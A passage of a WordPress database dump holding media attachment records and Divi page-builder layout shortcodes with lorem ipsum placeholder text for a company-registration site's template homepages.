11:26:06','','Ebook-cover','','inherit','open','closed','','free-report-cover','','','2016-07-02 15:15:27','2016-07-02 13:15:27','',496,'https://companyregistration.online/wp-content/uploads/2016/07/Free-Report-cover.jpg',0,'attachment','image/jpeg',0),(651,1,'2016-07-02 13:52:24','2016-07-02 11:52:24','','Free-Report-cover','','inherit','open','closed','','free-report-cover-2','','','2016-09-10 14:34:09','2016-09-10 12:34:09','',0,'https://companyregistration.online/wp-content/uploads/2016/07/Free-Report-cover-1.jpg',0,'attachment','image/jpeg',0),(662,1,'2016-07-07 22:50:52','2016-07-07 20:50:52','','00128','','inherit','open','closed','','00128','','','2016-07-07 22:50:52','2016-07-07 20:50:52','',571,'https://companyregistration.online/wp-content/uploads/2016/07/00128.mp4',0,'attachment','video/mp4',0),(3335,1,'2016-03-31 17:23:50','2016-03-31 15:23:50','[et_pb_section admin_label=\"Section\" fullwidth=\"on\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_fullwidth_slider admin_label=\"Fullwidth Slider\" show_arrows=\"on\" show_pagination=\"on\" auto=\"off\" auto_ignore_hover=\"off\" parallax=\"off\" parallax_method=\"off\" remove_inner_shadow=\"off\" background_position=\"default\" background_size=\"default\" hide_content_on_mobile=\"off\" hide_cta_on_mobile=\"off\" show_image_video_mobile=\"off\" header_font=\"Raleway|on|||\" header_font_size=\"12em\" header_text_color=\"#ffffff\" body_font=\"Source Sans Pro||||\" body_font_size=\"36\" body_text_color=\"#cccccc\" custom_button=\"on\" button_text_size=\"16\" button_text_color=\"#ffffff\" button_bg_color=\"#0065cb\" button_border_width=\"9\" button_border_color=\"#0065cb\" button_border_radius=\"100\" button_letter_spacing=\"3\" button_font=\"Source Sans Pro|on|||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_bg_color_hover=\"#2478cc\" button_border_color_hover=\"#2478cc\" button_border_radius_hover=\"100\" button_letter_spacing_hover=\"3\" custom_css_slide_button=\"margin-top:40px;||width:190px;||||\" body_line_height=\"1.2em\" header_font_size_last_edited=\"on|tablet\" header_font_size_tablet=\"20px\" button_letter_spacing_tablet=\"0\" button_letter_spacing_last_edited=\"on|desktop\" button_letter_spacing_hover_last_edited=\"on|desktop\" body_line_height_last_edited=\"on|phone\" top_padding=\"10em\" top_padding_last_edited=\"on|phone\" bottom_padding=\"10em\"]\n\n[et_pb_slide heading=\"maker\" button_text=\"LEARN MORE\" button_link=\"#\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/0110.jpg\" background_position=\"default\" background_size=\"default\" background_color=\"#ffffff\" alignment=\"center\" background_layout=\"dark\" allow_player_pause=\"off\" header_font_select=\"default\" body_font_select=\"default\" custom_button=\"off\" button_font_select=\"default\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" use_bg_overlay=\"off\" use_text_overlay=\"off\" text_border_radius=\"3\" header_font=\"||||\" header_font_size_last_edited=\"on|desktop\" body_font=\"||||\" body_font_size_tablet=\"26\" body_font_size_phone=\"26\" body_letter_spacing_tablet=\"0\" body_letter_spacing_phone=\"0\" button_text_size_tablet=\"50\" button_text_size_phone=\"50\" button_letter_spacing_tablet=\"50\" button_letter_spacing_phone=\"50\" button_font=\"||||\" button_letter_spacing_hover_tablet=\"50\" button_letter_spacing_hover_phone=\"50\" body_font_size_last_edited=\"on|phone\" body_letter_spacing_last_edited=\"on|tablet\" body_line_height_last_edited=\"on|tablet\" header_letter_spacing_last_edited=\"on|tablet\" header_line_height_last_edited=\"on|tablet\"]\n\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore.</p>\n\n[/et_pb_slide]\n\n[/et_pb_fullwidth_slider][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#0065cb\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px|0px\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"127px|64px\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Playfair Display||||\" text_font_size=\"42\" text_text_color=\"#ffffff\" text_line_height=\"1.3em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||80px|\" text_font_size_last_edited=\"on|tablet\"]\n\n<p>Introduction.<br />\nAdvanced Features.<br />\n<em>Human Support.</em></p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/02.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||23px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"20\" text_text_color=\"#ffffff\" custom_margin=\"||16px|\"]\n\n<p>LOREM IPSUM</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n<p>Sed ut perspiciatis unde omnis iste natus errorae  sit voluptatem accusa antium doloremque nor laudantium, totam rem. Consect edipi.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/03-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||23px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"20\" text_text_color=\"#ffffff\" custom_margin=\"||16px|\"]\n\n<p>LOREM IPSUM</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n<p>Sed ut perspiciatis unde omnis iste natus errorae  sit voluptatem accusa antium doloremque nor laudantium, totam rem. Consect edipi.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"0px|140px\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_2\"][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/031.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||23px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"20\" text_text_color=\"#ffffff\" custom_margin=\"||16px|\"]\n\n<p>LOREM IPSUM</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n<p>Sed ut perspiciatis unde omnis iste natus errorae  sit voluptatem accusa antium doloremque nor laudantium, totam rem. Consect edipi.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/04.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||23px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"20\" text_text_color=\"#ffffff\" custom_margin=\"||16px|\"]\n\n<p>LOREM IPSUM</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n<p>Sed ut perspiciatis unde omnis iste natus errorae  sit voluptatem accusa antium doloremque nor laudantium, totam rem. Consect edipi.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/029.jpg\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#ffffff\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" custom_padding=\"74px|0px\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Playfair Display||||\" text_font_size=\"62\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px|||\" text_font_size_tablet=\"42\" text_font_size_last_edited=\"on|phone\"]\n\n<p>The Video Presentation</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" max_width=\"720px\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\"]\n\n<p>Sed ut perspiciatis unde omnis iste natus errorae  sit voluptatem accusa antium doloremque nor laudantium, totam rem. Consect edipi.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"460px\" use_custom_gutter=\"off\" custom_padding=\"80px|60px\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_video admin_label=\"Video\" src=\"https://www.youtube.com/watch?v=ZE4nW5fS0eM\" image_src=\"https://companyregistration.online/wp-content/uploads/2016/07/03.png\" play_icon_color=\"#ffffff\"]\n\n\n\n[/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#0065cb\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px|0px\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"127px|132px\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Playfair Display||||\" text_font_size=\"42\" text_text_color=\"#ffffff\" text_line_height=\"1.3em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||20px|\" text_font_size_last_edited=\"on|\"]\n\n<p>What We Offer.<br />\n<em>Our Skills.</em></p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" custom_margin=\"||34px|\" text_line_height=\"1.4em\"]\n\n<p>Lorem ipsum dolor sit amet, me consectetur adipiscing elit, sed do eiusmod au est tempor incididunt ut labore et dolore magna aliqua.  Ut enim ad minim veniam, quis nostrud.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" custom_margin=\"||36px|\" text_line_height=\"1.4em\"]\n\n<p>Duis aute irure dolor in reprehenderit in volup tate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupid atat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Lorem ipsum sint occaecat cupid atat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\n\n[/et_pb_text][et_pb_counters admin_label=\"Bar Counters\" background_layout=\"light\" background_color=\"rgba(255,255,255,0.33)\" bar_bg_color=\"#ffffff\" use_percentages=\"on\" bar_top_padding=\"12px\" title_font=\"Source Sans Pro|on|||\" title_font_size=\"14\" title_text_color=\"#ffffff\" percent_font_size=\"1\" percent_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_counter_title=\"margin-bottom:5px;\" border_radius=\"100\"]\n\n[et_pb_counter percent=\"20%\"]\n<p>20% LOREM IPSUM SIT AMET</p>\n[/et_pb_counter][et_pb_counter percent=\"60%\"]\n<p>60% LOREM IPSUM SIT AMET</p>\n[/et_pb_counter][et_pb_counter percent=\"40%\"]\n<p>40% LOREM IPSUM SIT AMET</p>\n[/et_pb_counter]\n\n[/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/045.jpg\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#ffffff\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" custom_padding=\"72px|60px\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Playfair Display||||\" text_font_size=\"62\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px|||\" text_font_size_tablet=\"42\" text_font_size_last_edited=\"on|phone\"]\n\n<p>Our Clients</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" max_width=\"720px\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\"]\n\n<p>Sed ut perspiciatis unde omnis iste natus errorae  sit voluptatem accusa antium doloremque nor laudantium, totam rem. Consect edipi.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"off\" custom_padding=\"0px|86px\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/09.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/10.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/112.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/12.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section]','Homepage #1','','publish','closed','closed','','homepage-1','','','2016-03-31 17:23:50','2016-03-31 15:23:50','',0,'https://companyregistration.online/et_pb_layout/homepage-1/',0,'et_pb_layout','',0),(3357,1,'2016-03-31 17:59:47','2016-03-31 15:59:47','[et_pb_section admin_label=\"Section\" fullwidth=\"on\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_fullwidth_slider admin_label=\"Fullwidth Slider\" show_arrows=\"on\" show_pagination=\"on\" auto=\"off\" auto_ignore_hover=\"off\" parallax=\"off\" parallax_method=\"off\" remove_inner_shadow=\"off\" background_position=\"default\" background_size=\"default\" hide_content_on_mobile=\"off\" hide_cta_on_mobile=\"off\" show_image_video_mobile=\"off\" header_font=\"Raleway|on|||\" header_font_size=\"12em\" header_text_color=\"#ffffff\" body_font=\"Source Sans Pro||||\" body_font_size=\"36\" body_text_color=\"#cccccc\" custom_button=\"on\" button_text_size=\"16\" button_text_color=\"#ffffff\" button_bg_color=\"#e87511\" button_border_width=\"9\" button_border_color=\"#e87511\" button_border_radius=\"100\" button_letter_spacing=\"3\" button_font=\"Source Sans Pro|on|||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_bg_color_hover=\"#e88937\" button_border_color_hover=\"#e88937\" button_border_radius_hover=\"100\" button_letter_spacing_hover=\"3\" custom_css_slide_button=\"margin-top:20px;||width:190px;||||\" body_line_height=\"1.2em\" header_font_size_tablet=\"11em\" header_font_size_last_edited=\"on|phone\" button_letter_spacing_last_edited=\"on|phone\" button_letter_spacing_hover_last_edited=\"on|tablet\"]\n\n[et_pb_slide heading=\"innovation\" button_text=\"LEARN MORE\" button_link=\"#\" background_position=\"default\" background_size=\"default\" background_color=\"#ffffff\" alignment=\"center\" background_layout=\"dark\" allow_player_pause=\"off\" header_font_select=\"default\" body_font_select=\"default\" custom_button=\"off\" button_font_select=\"default\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/0111.jpg\" use_bg_overlay=\"off\" use_text_overlay=\"off\" text_border_radius=\"3\" header_font=\"||||\" header_font_size_tablet=\"3em\" header_font_size_phone=\"3em\" header_font_size_last_edited=\"on|phone\" body_font=\"||||\" body_line_height_phone=\"1.2\" button_text_size_tablet=\"50\" button_text_size_phone=\"50\" button_letter_spacing_tablet=\"50\" button_letter_spacing_phone=\"50\" button_font=\"||||\" button_letter_spacing_hover_tablet=\"50\" button_letter_spacing_hover_phone=\"50\" header_line_height_last_edited=\"on|desktop\" body_font_size_last_edited=\"on|desktop\" body_letter_spacing_last_edited=\"on|desktop\" body_line_height_last_edited=\"on|phone\" header_letter_spacing_last_edited=\"on|phone\"]\n\n\n\n[/et_pb_slide][et_pb_slide heading=\"creation\" button_text=\"LEARN MORE\" button_link=\"#\" background_position=\"default\" background_size=\"default\" background_color=\"#ffffff\" alignment=\"center\" background_layout=\"dark\" allow_player_pause=\"off\" header_font_select=\"default\" body_font_select=\"default\" custom_button=\"off\" button_font_select=\"default\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/0111.jpg\" use_bg_overlay=\"off\" use_text_overlay=\"off\" text_border_radius=\"3\" header_font=\"||||\" header_font_size_tablet=\"3em\" header_font_size_phone=\"3em\" header_font_size_last_edited=\"on|tablet\" body_font=\"||||\" button_text_size_tablet=\"50\" button_text_size_phone=\"50\" button_letter_spacing_tablet=\"50\" button_letter_spacing_phone=\"50\" button_font=\"||||\" button_letter_spacing_hover_tablet=\"50\" button_letter_spacing_hover_phone=\"50\" header_letter_spacing_last_edited=\"on|tablet\" header_line_height_last_edited=\"on|phone\" body_font_size_last_edited=\"on|phone\" body_letter_spacing_last_edited=\"on|tablet\" body_line_height_last_edited=\"on|phone\"]\n\n\n\n[/et_pb_slide][et_pb_slide heading=\"revolution\" button_text=\"LEARN MORE\" button_link=\"#\" background_position=\"default\" background_size=\"default\" background_color=\"#ffffff\" alignment=\"center\" background_layout=\"dark\" allow_player_pause=\"off\" header_font_select=\"default\" body_font_select=\"default\" custom_button=\"off\" button_font_select=\"default\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/0111.jpg\" use_bg_overlay=\"off\" use_text_overlay=\"off\" text_border_radius=\"3\" header_font=\"||||\" header_font_size_tablet=\"3em\" header_font_size_phone=\"3em\" header_font_size_last_edited=\"on|tablet\" body_font=\"||||\" button_text_size_tablet=\"50\" button_text_size_phone=\"50\" button_letter_spacing_tablet=\"50\" button_letter_spacing_phone=\"50\" button_font=\"||||\" button_letter_spacing_hover_tablet=\"50\" button_letter_spacing_hover_phone=\"50\" header_letter_spacing_last_edited=\"on|desktop\" header_line_height_last_edited=\"on|tablet\" body_font_size_last_edited=\"on|phone\" body_line_height_last_edited=\"on|phone\" body_letter_spacing_last_edited=\"on|desktop\"]\n\n\n\n[/et_pb_slide]\n\n[/et_pb_fullwidth_slider][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#e87511\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px|0px\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" custom_padding=\"120px|0px\" custom_padding_tablet=\"80px||0px|\" custom_padding_last_edited=\"on|tablet\" parallax_1=\"off\" parallax_method_1=\"off\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Playfair Display||||\" text_font_size=\"62\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px|||\" text_font_size_tablet=\"42\" text_font_size_last_edited=\"on|phone\"]\n\n<p>An Amazing Presentation</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"77px|0px\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/021.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||23px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"20\" text_text_color=\"#ffffff\" custom_margin=\"||16px|\"]\n\n<p>LOREM IPSUM</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n<p>Sed ut perspiciatis unde omnis iste nat errorae  sit voluptatem acusa estum doloremque nor laudantium, tom rem. Consect edipi au lorem orestem.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||23px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"20\" text_text_color=\"#ffffff\" custom_margin=\"||16px|\"]\n\n<p>LOREM IPSUM</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n<p>Sed ut perspiciatis unde omnis iste nat errorae  sit voluptatem acusa estum doloremque nor laudantium, tom rem. Consect edipi au lorem orestem.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/041.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||23px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"20\" text_text_color=\"#ffffff\" custom_margin=\"||16px|\"]\n\n<p>LOREM IPSUM</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" 